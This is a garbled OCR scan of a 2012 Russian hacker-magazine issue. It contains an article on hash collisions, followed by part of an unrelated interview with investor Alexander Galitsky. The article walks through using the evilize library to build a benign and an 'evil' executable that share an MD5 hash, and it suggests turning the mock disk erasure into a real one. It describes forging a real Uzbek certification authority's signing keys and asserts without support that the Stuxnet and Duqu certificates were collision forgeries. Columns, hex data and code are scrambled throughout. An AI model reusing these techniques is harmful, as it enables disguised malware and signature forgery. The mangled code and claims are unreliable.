сложность, криnтастойкость и так далее]. Простейшим nримерам

быстрый сnособ, то эта хэш-функция nерестает считаться крипта­

хэш-функций может служить

стойкой, а также использоваться для nередачи и хранения секретной

мом хэш-функции, а представляет из себя алгоритм вычисления

информации . Но всегд а ли это так? Оказывается, далеко не всегда.

контрольной суммы. По скорости вычисления он в деся т ки и сотни

ISMUttiiil

значительно nроще в апnаратной реализации. Однако n л атой за

CRC,

который не явл я ется ал г ори т­

раз быстрее, чем криптографические хэш-функции, а также

Итак, коллизией хэ ш -функции

F называются два различных входных F[x] = F[y]. Рассмотрим в качестве

блока данных- х и у- т аких, что примера хэш-функцию

F[x] = х[19[, опреде л енную на множестве це­

высокую скорость является возможность легко nо д о гн ать боль ш ое количество сообщений под заранее известную сумму. Так разря д ­

ность контрольных сумм [тиnичное число-

32 бита ] ниже, чем 128, 160 и 256 бит], что

лых чисел. Ее ОДЗ [из школьного курса математики ты должен знать,

у криnтографических хэш ей [тиnичные числа:

что это такое] состоит из

означает возможность возникновения неnреднамеренных коллизий.

19 элементов [кольца вычетов no мод улю 19],

а область определе н ия стремится к бесконечности. Так как множе­

В качестве nримера можно nривести следующий код на С, демон­

ство nрообразов заведомо больше множества значений, коллизии

стрир у ющий nолучение трех СRС-коллизий на

100 000

и т ераций:

обязательно существуют. Что это значит? Давай построим коллизию для этой хэш-функции, исnользуя входное значени е

которого равна нулю. Так как функция

19, то д л я

38, хэш- су мма Flxl периодическая с периодом

любого входного значения у значение у+ 1 9 будет иметь ту

ТАБЛИЦАХЭШ-ФУНКЦИЙ,ДЛЯ КОТОРЫХ БЫЛИ НАЙДЕНЫ КОЛЛИЗИИ Д л инн а х эw · э н а ч е ни я

Алгори т м

Одновременная схема

Davies· Meyer ( с ID EAI

128

Ск орость шифров а ни я

( К бай т/с(

22

Davies-Meyer (с DESI

64

Хзш·функция ГОСТ

256

11

HAVAL 13 nрохода(

nеременная

168

#include <stdio.h> #include <unistd.h> #include <stdlib.h> #define INTE RATION 100000 int main () { int count =0; int i,j ; unsigned hash; char с; unsigned* t а Ы е; tа Ы е = calloc(I NTERATION, sizeof ( unsigned )); for (i = 0; i< INTE RATION; i++ ){ hash = 0; for (j=0; 32 > j;j++){ с = 33 + ( char ) (63 .0*r and ()/ (RAND_M AX+1. 0)); ha s h = ( hash * 33 ) + с;

HAVA LI 4npoxoдal

nеременная

118

HAVAL 15 nрохода(

nеременная

95

MD2

128

23

has h = hash + (hash >> 5); for (j=0; i > j ;j ++ ) if (taЫe [j ]

М04

128

236

taЫe [ i]= h ash;

MD5

128

174

N-хэшl12этапов)

128

29

ha sh) count++ ;

free( t aЫe);

printf( "%d values %d collisions \ n" ,INTERATION, cou nt) ; return 0;

N-хэш(15этаnовl

128

24

RIPE-MD

128

182

SHA

160

75

Snerfu 14 nрохода)

128

48

Среди множества существующих хэш-функций принято осо­

Snerfu 18 проходовl

128

23

бенно выделять криптаграфически стойкие,- они nрименяются

Таблица хэ ш - ф у нкций , АЛЯ к оторы х были н ай А е н ы колли з ии

в криnтографии. К nримеру, существуют два наиболее часто

ХАКЕР 04/159/2012

020

www.epidemz.net


Оп ас н ый дв о йник

Verity Certificate

IV- начальное

значение буфера , а

L1

и

L2- различные

сооб щ е ­

ния . Нап р имер , если взять начальн о е з н ачение буфера

Co mmon Na me: C- l.ledia Electronics ln corpora tion А

Status: Rev oked Va lidity (GI,\ ): Aug Class:

З,

2009- A ug 2, 2012

D i g~ a ll

Class ? - Softl'lare Valid ation FreeRe placement i g~ a ll

Country:

и задать входное сообщение

AAlDDABE l ee6363 E 98A1F B19 1326ED65

aipei Т1f

Se rial Number: 046931 Ьf57e bc5947d~c4 ee 7 a 236 e lss uer Digest:

e xSF 62897C ex4BA763 ED

Class ? - 1.\ icrosoft Softl'l are Va lidation v2

State: Tail'l an City! Location :

ех3 В 3 41е4 2

С

D

Organization : C-1.\edia Electron ics lncorporation Organization al U n~ :

е х 12АС 2375

в

2a 4BdOfca cЗca 29d9 a З4f f fSOЗb2c29f

D97AB FF5 72 18 2 е 9 о

1FAE44Be D93 Ee972

BBFe ElC l Ee1C136D 23688992 0458(868

32774244 9DA64De E 68 7 А 779 8 6 8 727 4 6 А

то добавляя число 2л9 к определенному 32-раз р ядному сло в у

в б лочном б у фере, можно получить второе сообщение с т аким же

Проверка подлинности сертификата на VeriSign

хзшем. Есть несколько программ, которые помо г у т т ебе вс е э т о

дело провернуть [обрати вн и мание на ссы л ки в бо к о в ом вын осе ! . в с тречающи хс я в пов с едневн о й жизн и алг о р и тм а:

В п л ан е бе зо п ас ности предшественник

MD5

MD4 . В

MD4

и

MD5 . МЕТОДЫ ПОЛУЧЕНИЯ ПРОФИТА

являет ся бо л ее н адежным, чем е г о

П е р е д тем как начать практич ес к у ю часть , мы должны добить

новый алгоритм р а зра бот чики добавили

тео рию . Дел о в т о м , что так называемые коллизии мы можем

еще оди н раунд- теперь вместо тре х их стал о ч е т ы р е. Также бы л а

доба в лена новая константа , чтобы свести к мин и м у м у влияние

и с п о льзовать в каче с тве ключа / паролядля аутентифика ц ии в р аз­

вхо дн о г о сообщен и я. В каждом р а унде на каждом шаге константа

личном ПО и на веб-ресурсах. Это значит, что даже без з н ания п а­

все гд а р азная, она сумм и руется с результатом

р о ля , имея на р у ках только лишь его хэш, мь1 можем сгенерировать

блоком д анных.

И з м е н илась функция G = XZ v [У пot[Z I I [вмест о ХУ v XZ v YZI. Рез уль ­

правдаподобный па сс еорд с помощью коллизии , причем за вп ол н е

тат каждого шага складыв а е т ся с результатом п редыдущего, из-за

при е млем о е время . Однако на данный момент существуют и п о­

это г о пр о и сходит бо л ее быст р о е изменение ре зультата. Изменился

в се м е стно исп о льз у ются лишь несколько видов <<взло м а>> хэ ше й

по ряд ок работы с в хо д ным и словами в раундах

MD4/ 5, т о есть подбора сообще н ия с зада нн ым хэшем . 1. Перебор по заданному сло в арю: н икаких г аран ти й удач но г о

2 и 3. Даже н еболь ­

ш ее из м е н е ни е в хо дн о г о сооб щ е ни я [ в н а ш ем случае на оди н би т :

ASC II с имв о л «5» с к о д ом О х3516 = 0001101012 заменяе т ся на символ «4» с ко д ом Ох3416 = 00011010021 приводит к полному изменению

резу л ьтата нет, из плюсов м ожно отмети т ьл ишь м а л ое вр е мя ,

зат ра че н ное на перебор.

хз ш а. Такое с в ойство ал г о р итма назы в ается лавинным эффектом.

2. Брутфорс: банальны й перебор случайных или после д овате л ь ны х

В от так выгл я дит приме р 128 - бит н ого [16-байтногоl МD5-хзша:

комбинаций , большим мину с ом которого является з н ачител ьн ое количество затраченного времени и ресурсов к о мпью т е р а.

MD5( "md5" ) =

3. RaiпbowCгack: атака по радужным таблицам яв л яе т ся са м ым

lbc29b36f623ba82aaf6724fd3Ы6718

эффективным мето д о м « взлома >>; плюс заключается в быстром Кстати, ес л и гово р ить ко н кретно о коллизия х в алгоритме

переборе , минусы- в гигантском размере ра д ужн ы х таб лиц

MD5, т о з д есь м ы м ожем п олучит ь о д и н аковые значения функции [FI для

и б ольшом количе с тв е времени, затраченном на их ге н ера ц ию.

р азных сооб щ ен и й и и д ентичного начального б у ф е ра. Так, напри­ м е р , для извест н ого сооб щ ени я можно построить второе- тако е,

Для полного перебора или пе р ебо р а по словар ю м ож н о и с­

ч то о н о б уд е т им е ть т а к ой ж е хэ ш, к ак и исходное. С то ч ки з р ения

пользовать, к при меру, следующие п рогра м м ы : P asswoг d s P гo,

мате матик и это оз н а ч ает сле д ую щ ее: MD 5[ 1V, L11 = MD 5[ 1V, L21, где

MD5B FCPF, J ohп the

STUXNET И

R i ppeг.

• Об алгоритме MD5: bjt ly/awBxKK : • интересная

ПОДДЕЛЬНЫЕ СЕРТИФИКАТЫ

статья о коллизиях

lматчастьl :

Надеюсь , ты не забыл историю с руткитом Stuxпet, когда

на них:). Как бы парадоксально это не было , но существует

троян-драппер прогружал и запускал в системе свои драйверы ,

ряд доказатель с тв , подтверждающих мои слова . Во-первых ,

спокойно обходя всяческие системы предотвр а щения

на одном закрытом форуме, где тусевались разработчики этих

вторжений и антивирусы? Тогда при реверс - инжиниринге

нашумевших руткитов (хотелось бы особо отметить человека под

сэмnлов вь1яснилось , что драйверы руткит а были подписаны

ником огг, статьи которого присутствуют на ряде авторитетных

« настоящими>> се ртификатами крупных производителей

паблик-ресурсов , посвященных ИБ и реверс-инжинирингу :

контроллеров и чипов JМiсгоп и

woodmaп и орепгс е ) , с уществовал топик о возможности кражи

Realtek . Было

много шума ,

все кинулись обвинять эти компании в некомпетентности .

доверенных сертификатов . В нем приводился пример с

Аналогичная история повторилась и с « братом >> Stu x пet ­

сертификат (с закрытым ключом) которого был сгенерирован

червем

с помощью коллизии. Во-вторых , ес ли с равнить два сертификата

ics,

Duqu . На этот раз

обвинили компанию

C-Media

Electгoп­

се ртификаты которой также были якобы украдены. Все

(настоящий и тот, что был сгенерирован для

Duqu,

Duqu) по размеру,

вроде бы верно, но никаки х краж возможно и не было! Я думаю ,

то окажется, что существует хоть и малая , но все же разница

ть1 уже понял, о чем идет речь. Поддельные се ртификаты

в

были сгенерированы при помощи фундаментального б ага­

ноодинаковыепоконтрольнойсумме.Историясукраденными

коллизий. Антивирусы, проверяя контрольную сумму файлов,

сертификатами осталась бы практически незамеченной , если бы

не заметили никакого подвоха, а ведь все держалось именно

не работанезависимы х И Б-исследователей .

ХАКЕР

15 байт! Таким

образом , файлы получались разные по размеру,

04 / 159/20 12

bit.ly/byRrOu; • MD5 Collision Generator: bit.ly/zLRSEc;

• Evilize: bjt,ly/zEBLmj; • Rainbow MD5 Crack Ьу Collision Search: bjt.iy/vYRUxl;

• статья Климы

Властимила

«0

МD5 -

коллизиях »:

bit lvivDONuY; • HashCiash Framework: bjЦyl722ob;

научные работы

Марка Стивенса о коллизиях:

bjt.ly/ztdoHg .

021

www.epidemz.net


COVERSTORY

n ОТ ТЕОРИИ К ПРАКТИК Е Ну что же ; теперь перейдем к д о лгожданной практике. Среди профессиональных криптааналитиков есть вполне определенная классификация типов устойчивости алгоритмов хэширования , их всего три.

1. CR2-KK -свобо дн ый от коллизий, ус т ойчивый к коллизиям. 2. СR1-КК -универсальный односторонний . З.

СRО -универса льны й.

Также су щ ествуют три вида соответствующих атак для нахождения

колл и зий:

1. CR2-KK - найти коллизии для конкретной функции. 2. CR1-KK - подо брать к заданному зна ч ению пару, образующую коллизию для конкретной функции .

3. СКО - найти коллизию для семейства функций. Оригинальный сертиф и кат

Сегодня я продемонстрирую тебе два первых вида атак на

практике. Для начала nриведу два блока данных в НЕХ !пара коллизий из научной работы китайског о И Б-исследователя Ван

з овать nр им ер

Сяоюняl, их нужно вбить в hех-редакторе и сохранить в виде дв у х

Итак , к ом пилир у ем нашу nрограмму и линкуем ее с объектным

файлов:

файл ом goo dev il.o:

1-й файл

gcc hello-erase.c goodevil.o

hello-erase.c, идущий в комплекте с исходниками.

hello-erase

d131dd02c5eбeec4693d9aeб98aff95c2fcab58712467eab4ee4583eb8fЫf89

55ad340609f4b30283e488832571415ae85125e8f7cdc99fd91dbdf280373c5b

См от рим кон т ро льн ую сумму nодоnытного файла:

d882Зe3156348f5baeбdacd4Збc919cбdd5Зe2b487daeзfde239630бd248cdae

e99f33420f577ee8ce54bб7e8ea80dlec69821bcbбa883939бf9652bбff72a7e

md5sum . / hello-erase

2-й файл

/ home / satsura/ md5 col l /source/ev ilize / hello-erase

23d3e4873e3eaб 1 9c7bddбfa2d0271e7

d131dde2c5eбeec4693d9aeб98aff95c2fcab5e712467eab4ee458Зeb8fЫf89

Р азби в а ем на блоки нашу полученную контрольную сумму, и за­

55ad340609f4b30283e4888325f1415ae85125e8f7cdc99fd91dbd7280373c5b d8823e3156348f5baeбdacd4Збc919cбdd5Зe23487daeзfde239630бd248cdae

п ус ка ем н а исполнение генератор МD5- к оллизий:

e99f33420f577ee8ce54 b67080280dle c6982 1b cbбa883939бf965abбff72a7e

./md5coll 0x23d3e487 init.txt

Если сравнить размер и контрольную сумму в MD5 у п о л у ч е н­

е хЗеЗеаб 19 exc7bddбfa

ex2d0271e7 > \

ных файлов, то мы не заметим ника кой разницы! Теперь давай Далее запускаем evilize для создания двух различных испол­

найдем е щ е несколько коллизий к этим файлам. Программа MD5 Col li sion Geneгatoг о т Патрик а Стэча поможет нам разобраться в атаке CR2-KK. Смело компилируй ее и запускай на исполне ­

няемых файлов с одинаковым размером и МD5-хэш ем. Смотрим

ние . П ервая коллизия на моем самом слабом компьютере была

бинарники:

на контрольную сумму и размер, а затем запускаем полученные

получена ме не е чем за 15 минут, а вторая- примерно через два с nоловиной часаl Не так уж и плохо , согласись. Теперь nерейдем к реальной атаке , для этого будем исполь­

зовать эксnлойт-библиотеку evi lize !снова обрати внимание на ссылки!. П осле компиляции данной библиотеки в текущей дирек­ тории должны появиться три файла: evilize, md5coll и объектный файл goodevil.o. В качестве п одопытной программы будем исnоль-

./evi lize hello-era se -с init.t xt -g good - е evil du -sh ./evi l ./good & md5sum ./evi l . / good s,ек . /ev i l s,ек ./good . /evi l d8bf 2 1lbбlб24d331fe06c75bdбe 3c89 d8bf211b61624d33 1f eeбc75bdбe3c89 . /good

НЕМНОГО ИСТОРИИ Ганс Доббертин нашел псев ­

Китайские исследов ате ли Ван

Те же самые Ван Сяоюнь и Юй

доколлизии в MD5, используя

Сяоюнь IWang Xiaoyunl, Фен Дэн­

Хунбо опубликовали алго­

определенные инициализи­

гус IFeng Dengguol, Ла й Сюэцзя

рующие векторы , отличные от стандартны х.

ритм , позволяющий найти две

ILai Xuej ial и Юй Хунбо IYu Hongbol объявили об

различные последовательности в 128 байт,

обнаруженной ими уязвимости в алгоритме, по­

которые дают одинаковый МD5-хэш .

зволяющей находить коллизии за крайне малое

время 11 час на кластере IBM

p690I .

ХАКЕР

022

www.epidemz.net

04/159/20 12


О п ас ны й д войн и к

./good Hello, world! ./ evil This progra m is evi l ! !! Erasi ng hard dr i ve . .. 1Gb .. . 2Gb .. . j ust ki dd ing ! Nothing was erased . Как видишь, о дна программа выводит известную всем безо ­ бидную фразу

«Hello, worldl>>,

а вторая якобы стирает данные на

диске. Мы можем переделать наш hello-eгase.c так, чтобы вместо шуточного стирания данных п роизошло реальное, и тогд а будет

Коллизия в действии

не до шуток. Н о все это цветочки по сравнению со следующей атакой, которую я пров е л при своих иссл е дованиях

CR1-KK. образую щ ей коллиз ию для конкретной функции при ген е рации

ВЗЛОМ

CR1 - KK

элек трон но-цифро вых ключей. Изначально было несколько

В качестве <<же ртвы >> для исследований я выбрал цифр ов ые

данных, которые я и и с поль зовал в качестве входны х параме­

ключи компании Uпiсоп, являющейся в Узбекистане м оно поли­

тров. Оч ень облег чил за дачу тот факт, ч т о па роль для закры­

сто м в области ЭЦП [электронно-цифровой подписи! и се рти­

т ой Э Ц П у всех сертификатов один и тот же:

фикации. Осн о вы ваясь на труда х Властимила Климы , я написал

фатальн ая ошибка- са мая гр убая из в с треченных мной за весь

програ мм у

опыт работы в облас ти ИБ . И мея на руках только контрольные

CR1-KK-collisio n keyge n для

п о д бора пар ы к зна чению ,

000000.

Это была

суммы файлов и открытые ключи, мне удалось сгенерировать прим ерный ориги нальный закрыт ый ключ для подписи раз­

;s/тdS.otl ~

sanjar@OxrOOtwOrm tJlock #l dor1e

lтdS

col! IVO

личного рода документов, ключей и иден т ификаци и пользова­

теля в не скольк их СR М -с и с т емах [к п римеру,

E-hujjat о т того же

монополиста!. Пр о деланн ую работу ты сможешь увидеть воо ч ию Ыосk #2 UI1Slgned

сJопе

на соо тв етствую щих скриншотах, в консоли же все это выгляде­

lПt rnO [ 32] ~ {

Ox5d4995бl, ОхбЬ45~~2с,

Ox242lf72e, Oxe434lf9r,

ло прим ерно так:

Ох~lбlебс9,

Ох57Ьс9беЬ,

ОхЬе4Ь9054,

Ох893387с0,

C: \ coll_te st > mdSs um * Ыdla3fб3f9784eef e8c237ff2484a78

Ox0633ad55, Оха2Ь23БОБ, Ox;rJ~Ocl9b, Oxd2e27f73, Ox3deb0900 , Oxed7b5505, Ox9105llce, Ох758Ь9212, Охd3БЬс97с,

Охdб0б9еf9,

Oxf742e78~.

Ох82442сбе,

ОхЬбfбd54е,

Oxfd8ec2d3, Охlб2е494б, Oxc93732fe, Ox50293ffa, Oxa8073ced, Ox1Bbfd87e, Ох7е~3Ьбf7,

Oxad5lбa4c,

Ох7dЬба015,

Ох84аlе48б,

*key((faked

col lis i on).

Ьу

key a654bd7eeьseбcf47caebe42b2fЗe575 c5dбaaa286 393 16614e3d95987fcb612 аб54Ьd7ееьsебсf47саеЬе42ЫfЗе575

OxfЫcOf72,

*cer(faked *pfx(faked *ce r. cer

Как видишь, у сертификатов сег.сег и

};

Ьу Ьу

col l i si on).ce r col l i sion). pfx

cer[ faked Ьу coll isioni .cer

одинаковая контрольная сумма.

ur1s1gr1erJ

~ { Ox242lf/2e, Oxe434lf9c,

111t rnl[Л]

Ox5d4995бl, ОхеЬ45аа2с,

1 Ох~lб1Рбс9,

Ох57Ьс9беЬ,

ОхЬе4Ь9054,

Вх89ЗЗВ7с0,

Н а до при з нать , что МD5-х э ши стали неотъемлемой частью на­ шей жизни. Они вездес у щи. Их используют в качес т ве ал г о р ит­

Ox0633ad55, Оха2ЫЗ60б, Oxala0cl9b, Oxd2e2ff73, Ox3deb0900 , Oxed7b5505, OxllOSllce, 0х758Ь9212, Охd3бЬс97с, Oxdб069ef9, Oxf742e78a, Ох82442сбе, Ох3бfбd54е, Oxfd8ec2d3, Охlб2е494б, 0xad5lбa4c, Ох7dЬба015, Oxc93732fe, Ox50293ffa, Ox84al6486, Oxa8073ced, Oxl8Ьfd87e, Oxfea3bбf7, OxfЫcOf72,

мов для хэширования nаралей как в nрограммнам обес п ечен и и, так и на веб-ресурсах. О н и не зависят н и от пл атфо рм ы, ни о т О С, на которых исполняются. Векторы атак также доволь н о ш ироки : от б анкоматов до цифровы х подписей, от авторизации клие н т­ сер в е р и до целостн ос ти n е р е даваемых по сети файлов. Я вляясь быстрыми и менее крип тос тойкими , 128-битные алгоритмы хэширования принесут е ще н емало бед. Н а сего д ня ш ний д е нь

};

коллизии и псевдоколлизии б ы ли н ай д ены в бол ьш о м р я д е а лг о­

san ar@OxrBOtwOrm

ритмов, с р е ди которых

MD2, MD4, MD5, DE S, DE S- IDE A, RIPEMD, HAVAL[- 128, -2561, SHA-1, ГОСТ Р 34 .10-200 1 и так д алее. Со

-/s/mdScoll ~

временем этот список будет только пополняться.

Ге нерируем к олли з ии

I

Чешский исследователь

Эдуарда Диаз по сп е циально

Властимил Клима опубли­

разработанной с х еме создал

библиотеку

ковал алгоритм, дающий

два различных архива с двумя

дания двух разных программ

Дидье Стивене использовал

evilize

для соз­

возможность на х одить коллизии на обычном

разными программами , но абсолютно ид е н­

с одинаковым кодом цифровой сигнатуры

компьютере с любым начальным вектором

тичными МD5-хэшами.

(A,B,C,DI при помощи метода , названного им

(Authenticode digital signature), authenticode используется Microsoft для подnиси свои х

« туннелировани е».

библиотек и исполняемы х файлов .

ХАКЕР

04/159/2012

023

www.epidemz.net


COVERSTORY Наш гость- удив и тельны й человек . Он н ач и н а л сво й путь к а к ин ж енер и разраба т ывал ар хи те к туру к о м пьютер о в дл я

спутн и ков слежен и я . Его команда создала первые р абочие

зовать, и ты за нее бореш ься. Так и за калялея

образ ц ы

Wi-Fi и раньше все х представила пр о грам м н ую реал из ац и ю VPN для Windows. Запу с т и в не ск оль ко

характер, в таких вот сраже ния х-боях .

те х нол о г и ч ес к их комп а н ий, Ал ек сандр Гали цки й осн овал

Моя п ер вая вст реч а с ос н ов а т е ля м и Suп

венчурны й фонд

СОТРУДНИЧЕСТВО С

M i c гosy st em s с остоял а сь в

Pa гt ne гs, кото ры й х оро шо

Alma z Cap ital

SUN 1990 году.

К нам

в страну впервые приехали люди, с кото­

из в е с тен н е т оль к о в Р о ссии, но и в Си л иконов о й д о лине.

рыми мы имели право встречаться. Пр ав да , только через совместное предприятие- о ни создавались специально и контролировались,

дабы мы могли общаться, но были ск рыты. Тогда к нам прие зжал Билл Джой и еще один

НАЧАЛО КАРЬЕРЫ

технической мощи была сильно развита. И зто

Мой путь начинался в Советское время. Все

воспитывало в нас такую

мальчишки с периферии мечтали пробивать ся

ния. Поэтом у я рос в этой системе достаточно

через технические направления. Я хотел про­

быстро.

биваться через космос. Мне повезло- я попал

...

систему сраже­

активный человек- Джон Гей дж. который в то время был их директором по науке . Мы с Би л л о м Д ж ое м од н о г о в о зраст а, и у нас в о время разг о в о ра по шл о н е чт о вр од е

прот иво ст ояния. Я начал излагать какие-то

Помню, шеф вы з в а л меня, и мы долго

на работу к человеку, который был генераль­

обсуждали ар х ите кт уру н о в ого компьюте­

вещи- они стали удивляться. Ведь их кто-то

ным ко н структором систем спутниковой раз­

ра- ка к о н до·л же н ст рои тьс я . Я исходил из

заманил в Советский Союз, дикую в их глазах

программистских начал- мен я не устраивали

страну. В ходе этих дебатов я все время на­

существующие системы программирования:

ходил какие-то аргументы. В определенный

окунулся в т яжелые бессонные ночи про­

мы не могли легко менять код на ходу. То есть,

момент нашего спора я полез в карман и до­

гра м мистов , вкалывающих, чтобы запустить

технически- могли: спутники упра влялись

стал оттуда 22-слойную полиамидную плату,

первый спутник наблюдения с цифровым изо­

с Земли, и мы, естественно, кор ректировали

что ввергло их в полный осадок . В то время

бражением. До этого все спутники еще делали

код со станции управления, соф т помогал

в Америке их делали где-то в

с отстреливающимися кассетами на фотоаппа­

исправлять много доп у щенных аппаратных

она не получалась,- а тут целых

ведки и наблюдения.

Из фривольной научной работы я сразу

8 слоев, и у них 22 слояl

ратах. Мы делали первый спутник с системой

ошибок . Но все это требовало очень больших

запоминания и передачей данных через гео­

усилий, титанически х бессонных ночей. И, ко­

стационарные спутники. Я оказался в команде.

нечно, мы все время пытались зто совершен­

и космической аппаратуры . Была придумана

когда все железо уже сделали, а софт, как это

ствовать. Когда началась разработка новой

схема: чтобы решать проблемы габаритов,

часто тогда бывало, не работал.

архитектуры, со с тороны софта уже пошел

мы делали бескорпусную аппаратуру . То есть,

перелом-мы влияли на аппаратуру, и нас

корпуса снимались, и только чипы ставились

Мой шеф - Геннади й Яковлевич Гусь­

Наша компания тогда отличалась тем , что мы сидели на стыке микроэлектроники

ков- был настоящим предпринимателем.

стали больше с лушать . По сути дела, началась

на плату. Тогда весь мир начал смотреть в эту

Он обладал теми качествами, которыми от­

конкуренция за создание новой архитектуры.

сторону, и позже даже Suп выпустил некий

личались, например, Стив Джобс или Королев. В нем было много авантюризма, техническое

Мой бо с с ска з ал , что е с ли я хочу с делать свою арх ит ектуру , у м еня е ст ь две недели

компьютер, где SРАRС-процессор был именно бес корпусный. Естественно , э то п роизвело на Suп какое­

видение и тонна идей . Н апример, очень пока­

на формиров а н и е подраз д е л ения . До зто го

затель н ый момент: в Россию п риезжал Н иксо н

у меня, конечно, была куча софтовых инжене­

то н евероятное впечатление. Была осень

и встречался с Брежневым. Он привез с собой

ров, но тут- пожалуйста: бери разработчиков

года, когда они приехали к нам в Зеленоград насуперзакрытое предприятие. Там мы снова

1990

несколько чемоданов, развернул их, достал

чипов , бери разработчиков, которые будут

оттуда телефон и начал связываться со своими

платы разводить и воплощать архитектуру

много говорили, показали им еще что-то

посольствами в разных странах. Это, конечно,

в <<же лезо>> . Соответ ствен но , можно было по­

У них загорелись глаза, появились мечты-

высить ставки сотрудников в среднем на

у

произвело дикое впечатление. Был

1972

годl

10%-

Sun

..

вообще амбиций мно г о. Мол, как насчет

И Брежнев, естественно , заявил, что к поездке

это был достаточный бюджет, чтобы я мог их

закинуть

в Америку он хочет иметь т акую же систему.

переманить. Нельзя ведь нанять толпу народа

nонты-

SPARC в космос? Для них же зто SPARC в космосе, это же крутоl lntel космосе, и SPARC т оже в космосе. А Билл

Все ответили, что зто невозможно, и только

с улицы: они не прошли бы проверку по спе ц­

в

мой босс сказал: «Я это с д елаю». И сделал.

службам, а нужно было много люд ей. И вот я

Джой, как и все: в джинсах, в кроссовках.

К отъезду Брежнева в Ш таты все было обеспе­

начал ходить внутри и сманивать специали­

Ходи т, танцует, выпендривается. Ш еф говорит

чено: специальный десант высадился на Кубе

стов на новую перспективную работу, тем са­

мне: « Что за ненормальный такой?>>

для развертывания систем резервирова н ия

мым наживая себе кучу врагов: меня обзывали

и управления спутником ... Н о, тем не ме н ее,

«Карьеристом», негодяем , человеком , идущим

Брежнев смог достать свой чемодан, снят ь

по трупам ... В общем, я выслушал о себе

космический конгресс. С зтим связано немало

трубку и продемонстрирова т ь, что «МЫ ничем

кучунелестных вещей. Тем не менее , в таких

смешных историй. Наnример, мы вывезли

не хуже, чем они>> .

обстоятельствах понимаешь- у тебя есть две

туда очень много разного железа, включая

недели, тебе нужно сформировать подразде­

наш ядерный двигатель для космоса, луноход,

ление . У т ебя есть светлая идея что-то реал и-

нашу ранцевую аппаратуру связи с плоскими

Просто бешеное количество денег и сил тратилось тогда на все эти разработки . Воз­

В

1991

:1.

году мы впервые пое х али в США,

где проходил первый Советеко-американский

можно, это б ы ло н е со в сем п ра в и л ь н о с т о ч ки зре н ия экономики и про ч его, но, тем не менее,

эта часть достижений и доказательств нашей

ХАКЕР

021,

www.epidemz.net

04/159/2012


Интервью с венчурным инвестором

ИНТЕРВЬЮ С ВЕНЧУРНЫМ ИНВЕСТОРОМ

АЛЕКСАНдр ГАЛИЦКИИ

ФАКТЫ КанАиАат технических наук б

Изобретательно ла

Аательболее

зо патентов

Основатель ряАа успешаннь~ ~ технологических комn

СоЗАатель в енчур

н ого фонАад\mаz

ортфель кoтo­

Capital Partners, в ;и и как 1\нАекс , poro такие комnа дlterGeo Paralle\s, д\awar,

Увлекается горными лыжами и винАсерфингом

Чл е н Совета (<Сколкаво>>

ХАКЕР

025

04/159/2012

www.epidemz.net


COVERSTORY развит как сейчас. Ты не можешь пригото­ вить что-то вкусное, если не был на кухне: ты должен видеть, что делает повар. Я тогда В

антеннами, которую использовали наши служ­

1993

году мь1 впервые продемонстр и ро ­

вали работу РСМСIА-карточек

Потому что по какому-то там закону- ввозить

щих на скорости 4 М бит/с. Это было на выстав­

для них человек, поэтому меня таскали на

можно, а в. ывозить нельзя.

ке lпterop в Париже.

разные совещения [наверное, с мыслью, что

Тогда Sun 'овцы nригласили меня nриехать

Wi-Fi

Wi-Fi, работаю­

проводил много времени в Кремниевой

бы. И это все запретили вывозить обратно:).

долине и был такой абсолютно уникальный

я скажу что-нибудь умное). И Скотт Макнили,

в то время был нафиг никому н е

к ним в Калифорнию. В то время нас обхажи­

нужен ! Ни в России, ни на Западе . Для

вали все

это было непрофильное направление, поэтому

Шмидт. Когда я был в фирме, они все время

вместе с ними мы nоехали к

демократично приходили на обед со всеми

-IBM,

НР... Но все они были такие

очень формальные: в галстуках , костюмах,

и Энди Бэчтольшайм, и Билл Джой, и Эрик

Sun

Ericsson, самой

сотрудниками, но садились за отдельный стол

вели сложные разговоры. И помню, я приле­

революционной компании в данной сфере на

тел в Suп, встретился там со своим нынешним

тот момент.

партнером Джеффом Байером. Он сидел такой

со своимрадиомодемом-первый <<носиль­

в джинсах, в каких-то тапочках на б осу ногу,

ный>> компьютер, раскладушечка такая. Ее все

все так расслабленно ... И я подумал: <<Вот,

начали усиленно по купать . Было видно- чело­

этих бесед, я выносил сведения о каких-то ды­

это правильные пацаны, с которыми надо

век машин у останавливает, антенну открывает,

рах, которые тогда существовали. Одна из дыр,

работать! Что там какие-то

бах-бах-бах, и почту получил. Скорости

которую я подметил,- это реализация

IBM

и НР» . Так и за­

активно продавала Н Р

LX

19.2

кбит/с было более чем достаточно . Приложений

вязалась дружба. В один момент

Sun

прислала нам

компьютеров , стоимостью каждый

000 долларов .

Ericsson

15 no 25

Ну что с ними делать? Надо

и туда приглашали людей, с которыми хотели беседовать. Меня звали всегда.

Я nрос то слушал чужие беседы . Исходя из

VPN,

который нужен был для интернета, потому как

к nисьмам тогда не было- почта была чисто

не было защищенных каналов. Тогда я осо­

текстовая. Поэтому нам ответили: «Куда нам

знал, что

такие скорости? Нет рыночной nотребности>>.

и сказал: << Все, парни, делаем все в

« Какие же мы были тогда чудаки! », - го­

работать. Я пошел сдавать их на госкомпанию.

Но гасслужба по советскому закону не могла

ворил мне СЕО

взять от частного лица подарок на такую

с ним в

Sun

сумму, а таможня тогда с частных лиц денег

Ericsson, 2003-2004 году.

когда мы встречались

Sun

нифига не понимает в

Windows Windows!».

И мы взломали эти NОIS-драйверы, которые

Microsoft

не публиковала. Выполнили реверс­

инжиниринг, на который американцы либо

нас использовала чи сто для своих

неспособны, либо не делали его по этиче­

не брала. И один мой товарищ сказал: <<Что

нужд . Им было интересно кидать нам какие-то

ским соображениям, и разработали

ты мучаешься, ну не берут их у тебя- открой

нерешаемые задачи, и мы пытались их решить.

появился Suп Sсгееп Е+ и позже- российская

компанию>> . А открыть компанию занимало два

В

<< Застава>>.

дня ... Мы пошли и открыли. Так и образовалась

модули. Было очень мног о nроектов в сотруд­

мы выгребали баги, к нему же писали

ничестве с Эриком Шмидтом, который тогда

моя первая компания.

О СО ЗДАНИИ

Solaris

WI - FI

Так

VPN.

СОЗДАНИЕ ВЕНЧУРНОГО ФОНДА

был президентом софтового подразделения,

Я начал вкладывать в интересные проекты

а затем СТО компании. Я подбирал заказы,

свои личные деньги. Но потом решил- нет,

К концу 80-х мы начали вести испытания IР ­

смотрел, что там неправильно, мы лепили про­

что-то неправильно, нужно что-то менять,

протокола через наши системы передачи дан­

дукты и продавали их за большие деньги.

нужно решать это более комплексно. Нужно сделать фонд, который будет решать эту про­

ньlх. Я был апологетом Uniх-систем и считал, что IР-протокол позволяет нам делать очень

О ПР ЕДПРИНИМАТЕЛЬСТВЕ

